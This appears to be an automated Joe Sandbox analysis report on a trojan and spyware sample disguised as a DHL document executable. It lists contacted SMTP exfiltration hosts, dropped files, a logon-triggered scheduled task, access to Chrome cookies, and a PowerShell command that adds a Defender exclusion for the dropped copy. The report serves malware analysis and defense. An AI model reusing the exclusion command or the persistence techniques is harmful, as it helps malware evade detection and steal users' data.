                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.198.143
                      truefalse
                        high
                        smtp.4plqroup.com
                        unknown
                        unknowntrue
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSRegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://vDjxZe6kQogGh.orgRegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527902827.0000000002C15000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000002.527994577.0000000002C2D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://smtp.4plqroup.comRegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000007.00000002.527952759.0000000002C1F000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDhl Document 7348255141.exe, 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpfalse
                              high
                              http://aXZVkw.comRegSvcs.exe, 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipDhl Document 7348255141.exe, 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, RegSvcs.exe, 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.198.143
                              us2.smtp.mailhostbox.comUnited States
                              394695PUBLIC-DOMAIN-REGISTRYUSfalse

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:532892
                              Start date:02.12.2021
                              Start time:19:29:31
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 41s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Dhl Document 7348255141.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/9@2/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 0.6% (good quality ratio 0.4%)
                              • Quality average: 47.5%
                              • Quality standard deviation: 33.4%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532892/sample/Dhl Document 7348255141.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              19:30:32API Interceptor1x Sleep call for process: Dhl Document 7348255141.exe modified
                              19:30:40API Interceptor44x Sleep call for process: powershell.exe modified
                              19:30:51API Interceptor747x Sleep call for process: RegSvcs.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.198.143Swift MT103 pdf.exeGet hashmaliciousBrowse
                                PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                  RFQ-Spares and tools.exeGet hashmaliciousBrowse
                                    account details and invoice.exeGet hashmaliciousBrowse
                                      winlogon.exeGet hashmaliciousBrowse
                                        OUTWARD SWIFT-103 MSG Payment Transcript.PDF.exeGet hashmaliciousBrowse
                                          shipping documents.exeGet hashmaliciousBrowse
                                            DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                              iv71w7EjtR.exeGet hashmaliciousBrowse
                                                xiifZkOi7e.exeGet hashmaliciousBrowse
                                                  Payment slip URhcolexFq2SKzCxls.exeGet hashmaliciousBrowse
                                                    nxHHI8WXqt.exeGet hashmaliciousBrowse
                                                      PAGO DEL SALDO.docGet hashmaliciousBrowse
                                                        MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                          Reconfirm The Details.docGet hashmaliciousBrowse
                                                            Document.exeGet hashmaliciousBrowse
                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                  TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                    E invoice.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      us2.smtp.mailhostbox.comDhl Document.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      DHL Waybill receipt.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Swift MT103 pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Scan096355.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      yYa94CeATF8h2NA.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      BOQ.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      RFQ-Spares and tools.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      CARTASCONF.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      Documento de env.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      hkpg4iBhY1.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      account details and invoice.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      justificantepago_es_180208779493.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      winlogon.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      PO_783992883.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      OUTWARD SWIFT-103 MSG Payment Transcript.PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      ROfr29tilpUhTHx.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Transaction advice Nov-2021 20211129678pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      PUBLIC-DOMAIN-REGISTRYUSTNT Documents.exeGet hashmaliciousBrowse
                                                                      • 119.18.54.99
                                                                      Dhl Document.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      DHL Waybill receipt.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Shipping Document BL Copy.exeGet hashmaliciousBrowse
                                                                      • 103.195.185.115
                                                                      DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SHIPPING DOCUMENT & PL.exeGet hashmaliciousBrowse
                                                                      • 103.195.185.115
                                                                      Swift MT103 pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Scan096355.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      yYa94CeATF8h2NA.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                                      • 103.76.231.42
                                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                                      • 103.76.231.42
                                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      PG4636 - Confirmed .xls.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-1202816963.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      item-1202816963.xlsbGet hashmaliciousBrowse
                                                                      • 162.215.254.201
                                                                      DHL Receipt.htmlGet hashmaliciousBrowse
                                                                      • 199.79.62.126
                                                                      BOQ.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dhl Document 7348255141.exe.log
                                                                      Process:C:\Users\user\Desktop\Dhl Document 7348255141.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):1968
                                                                      Entropy (8bit):5.355630327889458
                                                                      Encrypted:false
                                                                      SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHxvjHKs:iqXeqm00YqhQnouRqjntIxHeqzTwRrqs
                                                                      MD5:5216C7BA51383BFD6FACE8756C452F56
                                                                      SHA1:9E34E791CF09C89CF2A8F0D57D48EC330AD29F93
                                                                      SHA-256:502CE33AFDC9B4C6CCCB5069A7B700064608BEEA4138ED4DFA206F23D33D03B2
                                                                      SHA-512:C1906EAC187E69D5B85384CB62C57713F03D4020DE941D97385DC3F2CAFECBACFD8AEC14E40AB34207ACD0319C368927A0F39F57F3BD135286FC83B207FB4FE4
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):22376
                                                                      Entropy (8bit):5.604286954787087
                                                                      Encrypted:false
                                                                      SSDEEP:384:9tCDtLULSb/LZqPK0JRgS0nAjultIO77Y9g9SJ3x+T1MaPZlbAV7uiny5ZBDI+fG:SpZCKPTACltRf9c8CufwKiKV1G
                                                                      MD5:7E76C938082D39A1986E9D90AFD8A72C
                                                                      SHA1:490A9E5B172841F533561766E9E0A3A901279999
                                                                      SHA-256:F8378D4F7FD547900DC428269708AEFFFC5505D283F7CADD1165E6151625C800
                                                                      SHA-512:7139FAA359CF42E0066B38E1A2AF47248F5411F5CE6DA5F5FCC996CD45A86AA0B0410421584F388BBF571F89815C8D491FD6605385586090B1D2D9AFBB916001
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: @...e...................h...c.X.U.........I..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zg3i0r2.gtb.psm1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no2i0ouo.d15.ps1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
                                                                      Process:C:\Users\user\Desktop\Dhl Document 7348255141.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1616
                                                                      Entropy (8bit):5.133726599000201
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh/dp1Kd+y1modHUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtBxvn:cgeHMYrFdOFzOzN33ODOiDdKrsuTHv
                                                                      MD5:A9D141DB36911DE5859C7B4E93C46F89
                                                                      SHA1:7CECAC0CA790936E70185950FED5EEC46E210D40
                                                                      SHA-256:D0B81AF896B05970A2B305EFD9D0B74D33DB1DD18F4E5000E6DBEB1C763070F7
                                                                      SHA-512:E438B4660D3E906FF41747A141BF362F3018A9C91950411DE0D40329316381F67A40FC54AAC26B2C56D33C3E767F186EAF9ED8476F5E4FE035EFB8925FB54BDD
                                                                      Malicious:true
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvai
                                                                      C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                                                                      Process:C:\Users\user\Desktop\Dhl Document 7348255141.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):554496
                                                                      Entropy (8bit):7.938247070407345
                                                                      Encrypted:false
                                                                      SSDEEP:12288:B4pYcrq3cPb08yVTFe9Y/q1dw8GImykgyXzt8S+SCcH:B4pYcrbIXTs9Jw8GINkJb9H
                                                                      MD5:7FC06B21DB75238CF0245B5264986778
                                                                      SHA1:07E0398E78AAABAF936843FA764DD75B83C90210
                                                                      SHA-256:8DC051198D7B28764D674B92EE567D9A6BA4A15C69D51ED654861B9205546768
                                                                      SHA-512:F4688BB24686210B2BFA65561542369D08D1421DF306E9D308EFC10A35950C9D7D5D806AC1C84ABD7F98619BC7126DD56B027978B65D410CE1BC7297451B1622
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Metadefender, Detection: 34%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..j..........R.... ........@.. ....................................@.....................................O.......<............................................................................ ............... ..H............text...hh... ...j.................. ..`.rsrc...<............l..............@..@.reloc...............t..............@..B................4.......H.......<8...G..........................................................>. 4......(....*2......o....*:........o....*.0..,........o....r...p $...........%...%....o....t....*&...o....*..(....*J.r!..p.s....(....*Js....%o....o ...&*..(!...*6.("....(....*..(....*"..(....*..0..$........{....,.*..}....r7..p.s.......(#...*&...($...*...0..x.........YE................)...6...C...+N..t....}....*..t....}....*..t....}....*..t....}....*..t"...}....*..t#...}....*..}....*.r...p.....(%.......
                                                                      C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\Dhl Document 7348255141.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                      C:\Users\user\AppData\Roaming\smix4gsg.ed5\Chrome\Default\Cookies
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.6969296358976265
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBo2+tYeF+X:T5LLOpEO5J/Kn7U1uBo2UYeQ
                                                                      MD5:A9DBC7B8E523ABE3B02D77DBF2FCD645
                                                                      SHA1:DF5EE16ECF4B3B02E312F935AE81D4C5D2E91CA8
                                                                      SHA-256:39B4E45A062DEA6F541C18FA1A15C5C0DB43A59673A26E2EB5B8A4345EE767AE
                                                                      SHA-512:3CF87455263E395313E779D4F440D8405D86244E04B5F577BB9FA2F4A2069DE019D340F6B2F6EF420DEE3D3DEEFD4B58DA3FCA3BB802DE348E1A810D6379CC3B
                                                                      Malicious:false
                                                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\Documents\20211202\PowerShell_transcript.284992.+DAhiF6l.20211202193039.txt
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5841
                                                                      Entropy (8bit):5.39256514760255
                                                                      Encrypted:false
                                                                      SSDEEP:96:BZ86UNLqDo1Z4ZU6UNLqDo1Z03EREvEjZC6UNLqDo1ZsgEfEfEQZW:bc4ZaaK
                                                                      MD5:B3263709AF0D15CD9B66CDE64AC39D4F
                                                                      SHA1:608D7A5825296780B293D0D28DCFDD1FEE372E63
                                                                      SHA-256:7512381ECF4D602B57CD5DCEF778C4FA053E5EA37A6FA77D0717C7A38A1EDF00
                                                                      SHA-512:2B0886BD5CA4D5524A09F40031C0E7E8B819A2553742419B4A2E2E101E21EC22AE0165F205238CF9AB825AB1BB279B2E9BA8C0C4B58468ED0E98E3BD722BAF0F
                                                                      Malicious:false
                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202193040..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe..Process ID: 1988..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202193040..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe..**********************..Windows PowerShell transcript start..Start time: 20211202193435..Username: computer\user..RunAs

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.938247070407345
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Dhl Document 7348255141.exe
                                                                      File size:554496
                                                                      MD5:7fc06b21db75238cf0245b5264986778
                                                                      SHA1:07e0398e78aaabaf936843fa764dd75b83c90210
                                                                      SHA256:8dc051198d7b28764d674b92ee567d9a6ba4a15c69d51ed654861b9205546768
                                                                      SHA512:f4688bb24686210b2bfa65561542369d08d1421df306e9d308efc10a35950c9d7d5d806ac1c84abd7f98619bc7126dd56b027978b65d410ce1bc7297451b1622
                                                                      SSDEEP:12288:B4pYcrq3cPb08yVTFe9Y/q1dw8GImykgyXzt8S+SCcH:B4pYcrbIXTs9Jw8GINkJb9H
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..j..........R.... ........@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x488852
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x61A42E0A [Mon Nov 29 01:34:02 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      sbb dword ptr [eax], eax
                                                                      add byte ptr [edx], ah
                                                                      pop dword ptr [eax]
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
